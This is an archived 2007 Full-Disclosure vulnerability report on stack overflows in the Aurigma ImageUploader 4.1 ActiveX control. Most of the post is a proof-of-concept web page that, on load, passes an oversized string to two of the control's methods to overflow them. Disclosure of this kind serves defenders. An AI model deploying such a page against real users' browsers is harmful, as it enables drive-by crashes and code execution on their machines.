| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <8904219.1195700132621.JavaMail.root@elwamui-milano.atl.sa.earthlink.net>
Date: Wed, 21 Nov 2007 21:55:32 -0500 (GMT-05:00)
From: Elazar Broad <elazarb@...thlink.net>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Aurigma ImageUploader 4.1 Multiple stack overflows
There are multiple stack overflows in the Aurigma ImageUploader 4.1 ActiveX control. I believe this control was installed by www.dotphoto.com. PoC as follows:
-----------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("Aurigma.ImageUploader.4.1"); //{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
obj.GotoFolder(s);
obj.CanGotoFolder(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
-----------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists